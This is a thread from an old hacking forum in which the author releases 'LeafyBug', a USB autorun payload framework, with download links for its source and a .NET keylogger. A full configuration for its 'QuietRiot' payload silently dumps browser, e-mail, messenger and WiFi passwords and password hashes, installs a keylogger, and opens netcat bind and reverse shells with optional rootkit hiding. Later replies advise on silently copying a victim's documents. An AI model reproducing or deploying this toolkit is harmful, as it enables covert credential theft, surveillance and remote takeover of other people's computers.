twsSentinel

oh crap .. sry guys! ... I forgot to config IIS for those files. *fixed*

LeafyBug has been released (Look up top at first post). Please read the update first though. Thanks guys for your support!

Hey guys .. I'll release it either tomorrow, or in the next couple days. There's a couple of things I'd like to see implemented. Also, I have completely lost my U3 Drive (OMG!) sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 Package Installer. Hopefully I'll buy a new drive within a wk. I'm also still undecided about releasing a rootKit with the QuietRiot. The leafybug has the ability to use the hxdef RK, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see. On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64 compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs. Anyways ... thanks for the support guys. Sorry for the wait!

it would not be difficult to fix this though, therefor I don't see the point. I guess it could be just annoying lol

hey there ... here's a U3 Dev Package ... Contains SDK, Prototyper, Manifest Creator, some other stuff... http://tws.serveftp.org/progs/U3 Dev Package (01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip://http://tws.serveftp.org/progs/U3 De...01.22.2007).zip or you can just download the SDK: http://tws.serveftp.org/progs/U3_Platform_...DK_May_2006.zip

very true, but come on ... if you are going to operate a web hosting company, you have to plan for these contingencies. Unless this attacker has enough zombie machines, in the hundreds or thousands, there are ways to defend against attacks.

Can they really be this bad at defending against a DDoS attack? My god, its been like a week straight.

The LeafyBug - A new advancement based off the SwitchBlabe PoC. Update: 6.09.2007 Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership to a new startup eBusiness. So that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted. Specifically the "Loader" application; so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off it detects if .NET is installed on the computer, therefor, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload!. I has a few other features to assist in run customization. Anyway, to no further wait: http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip << Framework exe http://tws.serveftp.org/software/LeafyBug/...ditor.zip << Payload Editor http://tws.serveftp.org/software/LeafyBug/...ource.zip << C# Source code for the framework http://tws.serveftp.org/software/LeafyBug/...ogger.zip << Small .NET Keylogger I made which works x86 & x64. Does not use WinAPI Hooks. *More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there. Please guys, accept my apologies on this release. I really intended to have it 100% finished; all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my pc server, so if you want to spread to RapidShare, be my guest. :) What is the LeafyBug? All this time here at Hak5.org, we've had several U3 Payloads come and go. Most of us found one we liked or created our own. However the LeafyBug brings a whole new aspect to the table. The LeafyBug, is NOT a payload, it is a payload framework which allows you to extend the Switchblade's concept to a greater extent. Think of it this way, the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files. The QuietRiot v2.1.5 is the first payload for this new framework. ;*********************************************** * ;* QuietRiot v2.1.5 Modules ;* LeafyBug Payload ;* Date: 5/25/2007 ;* Code: _DmG_ ;*********************************************** */ ;* ******************************************************************************** *********************************** * ;* Creating Custom Modules: ;* ;* To create a module you must specify certain variables... ;* =-----------------------------------------------------------------------------------------------------------------= ;* | Var | Value | Required | ;* =-----------------------------------------------------------------------------------------------------------------= ;* Enabled = Enabled or Disabled (Write 'true' or 'false') YES ;* Filename = EXE_NAME("Name of actual exe's name")(Ex. keyLogger.exe, netstat) YES ;* Mode = (Choices either 1,2,3) YES ;* 1 = SystemInfo (Ex. netstat, ipconfig) Used for system executable's only ;* 2 = Executable (The exe will be run from usb device) ;* 3 = Executable (The exe will be copied to target. If RootKit is enabled, it will ;* run under its protection.) ;* =-----------------------------------------------------------------------------------------------------------------= ;* FileDIR = Path to copy exe to if 'Mode'== 2 or 3 (Default. Leave empty) NO ;* PreArgs = Custom export args (This string will be sent after the EXE_NAME &amp; NO ;* before the output filename) Nirsoft applications generally use '/stext' to ;* output into a log, but some apps require something different. See the ;* "Firefox Passwords" module for an example. ;* PostArgs = Custom export args NO ;* If Mode == 2: This string will be sent after the output filename. Ex. See "AdapterWatch". ;* If Mode == 3: Use this string to set the name for the registry key. Ex. See "KeyLogger" ;* x64 = x64 Flag! (If you know an app is incompatible with x64 OS, than set to "true". NO ;* The app wont run.)(Default. Leave empty or false)(See "pwdump" module as an example.) ;* x64File = x64 Alternative EXE Support (If you have two executables one for x86, and x64, NO ;* you can set the EXE_NAME to the file here. ;* (See "CurrentPorts" &amp; "WifiKeys" modules as examples.) ;* Output = If the application will output text, leave blank or set to true, otherwise, false. NO ;* (See "NetCat" or "Keylogger", these programs dont require the app to finish.) ;* =-----------------------------------------------------------------------------------------------------------------= ;* ******************************************************************************** *********************************** * ;PRE-CONFIGURED VARIABLES: Use these to aid in settings. ; ;$DRIVE_DIR$ » Drive the payload executes from. ;$MACHINE_NAME$ » Target computers name. ;$SYSTEM$ » Target computers system32 directory. ;$DATE$ » Date of execution. ;$TIME$ » Time of execution. ;$NC_PORT$ » Port number specified in config file. ;$NC_RVS_IP$ » Reverse shell IP. ;$NC_RVS_PORT$ » Reverse shell port. [Anti-Virus Killer] Enabled=false Filename= Mode= FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output=false [NetStat] Enabled=false Filename=netstat Mode=1 FileDir=$FILE_DIR$ PreArgs=-n PostArgs= x64= x64File= Output= [AdapterWatch] Enabled=true Filename=quietriot_awatch.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=/stab PostArgs=1 x64= x64File= Output= [CurrentPorts] Enabled=true Filename=quietriot_cports.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64=true x64File=quietriot_cports64.exe Output= [Firefox Passwords] Enabled=true Filename=quietriot_FirePassword.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=&gt;&gt; PostArgs= x64= x64File= Output= [Internet Explorer] Enabled=true Filename=quietriot_iepv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Internet Explorer History] Enabled=true Filename=quietriot_iehv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Product Keys] Enabled=true Filename=quietriot_ProduKey.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Instant Messenger] Enabled=true Filename=quietriot_mspass.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [E-Mail Accounts] Enabled=true Filename=quietriot_mailpv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Windows Updates] Enabled=true Filename=quietriot_wul.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Protected Storage] Enabled=true Filename=quietriot_pspv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [WiFi Keys] Enabled=true Filename=quietriot_WirelessKeyView.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File=quietriot_WirelessKeyView64.exe Output= [KeyLogger] Enabled=true Filename=quietriot_NetLogger.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=-m hour PostArgs=MSKL x64= x64File= Output=false [PwDump] Enabled=true Filename=quietriot_pwdump.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=&gt;&gt; PostArgs= x64=true x64File= Output= [NetCat BindShell] Enabled=true Filename=quietriot_nc.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=-L -p $NC_PORT$ -d -e cmd.exe PostArgs=MSNCBS x64= x64File= Output=false [NetCat ReverseShell] Enabled=false Filename=quietriot_nc.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe PostArgs=MSNCRS x64= x64File= Output=false Oooohhh, Aaahhhhh ... What's so damn special about it?!? No more shell coding, you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just few more quick features to add. Here's why to migrate to the LeafyBug: [li]Full WinOS Compatability and Customization - x86 & x64[/li] [li]100% hidden running ... other payloads would show up on x64[/li] [li]LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.[/li] [li]Auto-Detects system architecture, allows you to specify 32&64bit apps for each module, and automatically executes the proper one.[/li] [li]RootKit Ability[/li] [li]Easy to create, expand, simplify with no code what-so-ever. Add new modules with ease in the editor.[/li] [li]Customize each module down to a T how it will run and execute.[/li] [li]Installation is simple, place whatever you want in any drive/directory[/li] [li]U3 & Non-U3 Compliant[/li]

Yep, I just did a little checking. Nakaori wrote this excellent little code. Create a file in your usb drive Ex.("usb:FILENAME.txt") Then you the above code to look for that file and get the drive letter. for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:FILENAME.txt set DRIVE = %%i I haven't tested it though, but should work.

Might be tough or not possible through shell code. You best chance I guess would be to create a For loop iterating through each letter of the alphabet and issuing the command: "vol DRIVE_LETTER:" and check to see if the drive volume exists and what its name is. This would be quite annoying, and Im not writing the code lol Why is ur payload on the CD partition anyway?

Another option would be for the switchblade app to check for that certain MS Hotfix, if its installed, and then either run the program or not. Would not be tough to implement. Also "shutdown.exe /a" will abort the shutdown process if its been executed.

Hey there ... What you're looking for is either of two programs. PackageFactory OR U3 Package Prototyper Both can convert a software into a U3 Program. However, that being said, it's only meant for certain software. An anti-virus might be too complex to do a simple convert, but it's worth giving a shot. If you need help getting the software let me know I'll post a link.

Nothing will show when the QRLoader runs. That's the point of having it 100% silent. lol It automatically executes QuietRiot.vbs via WScript.exe In order for it to work, however, the QRLoader.exe MUST be in the same folder as "QuietRiot.vbs" & "WScript.exe". If you want it in a different folder, you'll have to edit the C++ code and recompile it. But it's only a minor adjustment.

Thanks for the response. The QRLoader is an exe file which executes wscript.exe (Windows Script Host 5.6) and tells the WSH to run QuietRiot.vbs (the payload). It's not a required file, but very helpful. You can use it to configure your autorun.inf and other things like the U3 installer. The QRLoader is also open source, so any c++ developers can easily write extra features in it. Something that I've been meaning to write a small article on. Thank you for the suggestion/request ... That will be added into the payload in the next version. If I have some time later tonight .. I code it in quickly.

1) What is the difference (for switchblade) of having U3 as opposed to not? In other words, is it easier to steal information or does it steal more information? > There aren't any real advantages concerning a U3-Enabled Switchblade over a regular drive. You can configure it to do the same. The only loss is the ability to run U3 Applications. 2) What exactly does the default coding steal and how do you edit/manipulate this to steal other things? > As for myself, I've only used custom payloads and then now designed my own. (Quiet-Riot) They all offer many similar options, however, some are more equip than others. 3) How would I create a USB that automatically and silently copies all files from, say, the My Document folder? > Well if you're writing the payload in shell script, then you'll want to execute "%COMSPEC% copy %userprofile%My Documents FLASH_DRIVE_FOLDER" or something like that. Search google to learn shell scripting.